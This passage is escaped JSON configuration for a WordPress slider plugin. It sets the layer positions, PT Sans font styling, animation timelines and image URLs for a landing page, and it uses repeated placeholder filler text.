,\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"v\":\"16px\",\"e\":true},\"n\":{\"v\":\"16px\",\"e\":true},\"t\":{\"v\":\"16px\",\"e\":true},\"m\":{\"v\":\"16px\"}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"25px\",\"e\":true},\"n\":{\"v\":\"25px\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\"}},\"svg\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\",\"e\":true},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\"}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false,\"t\":false},\"type\":\"text\",\"version\":\"6.6.0\"},\"9\":{\"text\":\"It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout and web page.\",\"alias\":\"It is a long establi...\",\"uid\":9,\"size\":{\"width\":{\"d\":{\"v\":\"348px\",\"e\":true},\"n\":{\"v\":\"348px\"},\"t\":{\"v\":\"348px\",\"e\":true},\"m\":{\"v\":\"348px\"}},\"height\":{\"d\":{\"e\":true},\"t\":{\"e\":true}},\"originalWidth\":\"348px\"},\"position\":{\"x\":{\"d\":{\"v\":\"-538px\",\"e\":true},\"n\":{\"v\":\"127px\",\"e\":true},\"t\":{\"v\":\"247px\",\"e\":true},\"m\":{\"v\":\"247px\"}},\"y\":{\"d\":{\"v\":\"85px\",\"e\":true},\"n\":{\"v\":\"555px\",\"e\":true},\"t\":{\"v\":\"465px\",\"e\":true},\"m\":{\"v\":\"465px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\"},\"t\":{\"e\":true}},\"zIndex\":13,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":13,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8700,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\"},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"v\":\"16px\",\"e\":true},\"n\":{\"v\":\"16px\"},\"t\":{\"v\":\"16px\",\"e\":true},\"m\":{\"v\":\"16px\"}},\"fontWeight\":{\"d\":{\"e\":true},\"t\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"t\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"25px\",\"e\":true},\"n\":{\"v\":\"25px\"},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\"},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\"}},\"svg\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\"},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\"}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false,\"t\":false},\"type\":\"text\",\"version\":\"6.6.0\"},\"10\":{\"text\":\"It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout and web page.\",\"alias\":\"It is a long establi...\",\"uid\":10,\"size\":{\"width\":{\"d\":{\"v\":\"348px\",\"e\":true},\"n\":{\"v\":\"348px\"},\"t\":{\"v\":\"348px\",\"e\":true},\"m\":{\"v\":\"348px\"}},\"height\":{\"d\":{\"e\":true},\"t\":{\"e\":true}},\"originalWidth\":\"348px\"},\"position\":{\"x\":{\"d\":{\"v\":\"-536px\",\"e\":true},\"n\":{\"v\":\"129px\",\"e\":true},\"t\":{\"v\":\"249px\",\"e\":true},\"m\":{\"v\":\"249px\"}},\"y\":{\"d\":{\"v\":\"238px\",\"e\":true},\"n\":{\"v\":\"702px\",\"e\":true},\"t\":{\"v\":\"612px\",\"e\":true},\"m\":{\"v\":\"612px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\"},\"t\":{\"e\":true}},\"zIndex\":14,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":14,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8700,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\"},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"v\":\"16px\",\"e\":true},\"n\":{\"v\":\"16px\"},\"t\":{\"v\":\"16px\",\"e\":true},\"m\":{\"v\":\"16px\"}},\"fontWeight\":{\"d\":{\"e\":true},\"t\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"t\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"25px\",\"e\":true},\"n\":{\"v\":\"25px\"},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\"},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\"}},\"svg\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\"},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\"}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false,\"t\":false},\"type\":\"text\",\"version\":\"6.6.0\"},\"11\":{\"text\":\"Image 11\",\"alias\":\"Image 11\",\"uid\":11,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/landing-cimet-img-4-2.png\",\"imageId\":3556},\"size\":{\"width\":{\"d\":{\"v\":\"495px\",\"e\":true},\"n\":{\"v\":\"395px\",\"e\":true},\"t\":{\"v\":\"395px\"},\"m\":{\"v\":\"395px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"329px\",\"e\":true},\"n\":{\"v\":\"263px\",\"e\":true},\"t\":{\"v\":\"263px\"},\"m\":{\"v\":\"263px\",\"e\":true}},\"originalWidth\":600,\"originalHeight\":399,\"aspectRatio\":{\"d\":{\"v\":1.5037593984962405},\"n\":{\"v\":1.5037593984962405},\"t\":{\"v\":1.5037593984962405},\"m\":{\"v\":1.5037593984962405}}},\"position\":{\"x\":{\"d\":{\"v\":\"80px\",\"e\":true},\"n\":{\"v\":\"155px\",\"e\":true},\"t\":{\"v\":\"220px\",\"e\":true},\"m\":{\"v\":\"211px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-350px\",\"e\":true},\"n\":{\"v\":\"-281px\",\"e\":true},\"t\":{\"v\":\"139px\",\"e\":true},\"m\":{\"v\":\"156px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\"},\"m\":{\"e\":true}},\"zIndex\":15,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":15,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":900,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":900,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power2.in\",\"speed\":1000,\"start\":9000,\"startRelative\":8100,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\"},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"13\":{\"text\":\"Image 13\",\"alias\":\"Image 13\",\"uid\":13,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/03\\/recept-2.png\",\"imageId\":3730},\"size\":{\"width\":{\"d\":{\"v\":\"709px\",\"e\":true},\"n\":{\"v\":\"447px\",\"e\":true},\"t\":{\"v\":\"371px\",\"e\":true},\"m\":{\"v\":\"371px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"830px\",\"e\":true},\"n\":{\"v\":\"523px\",\"e\":true},\"t\":{\"v\":\"434px\",\"e\":true},\"m\":{\"v\":\"434px\",\"e\":true}},\"originalWidth\":735,\"originalHeight\":855,\"aspectRatio\":{\"d\":{\"v\":0.8596491228070176},\"n\":{\"v\":0.8596491228070176},\"t\":{\"v\":0.8596491228070176},\"m\":{\"v\":0.8596491228070176}}},\"position\":{\"x\":{\"d\":{\"v\":\"379px\",\"e\":true},\"n\":{\"v\":\"401px\",\"e\":true},\"t\":{\"v\":\"34px\",\"e\":true},\"m\":{\"v\":\"-18px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"25px\",\"e\":true},\"n\":{\"v\":\"-17px\",\"e\":true},\"t\":{\"v\":\"316px\",\"e\":true},\"m\":{\"v\":\"227px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"right\",\"e\":true},\"m\":{\"v\":\"right\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":16,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":16,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":900,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":900,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8100,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"action\":[{\"tooltip_event\":\"click\",\"action\":\"link\",\"image_link\":\"http:\\/\\/succulents.select-themes.com\\/home-6\\/\",\"link_open_in\":\"_blank\",\"link_follow\":\"follow\",\"jump_to_slide\":\"\",\"scrollunder_offset\":\"\",\"action_easing\":\"none\",\"action_speed\":\"\",\"actioncallback\":\"\",\"layer_target\":\"backgroundvideo\",\"link_type\":\"a\",\"action_delay\":\"\",\"toggle_layer_type\":\"visible\",\"toggle_class\":\"\"}],\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false},\"type\":\"image\",\"version\":\"6.6.0\"},\"14\":{\"text\":\"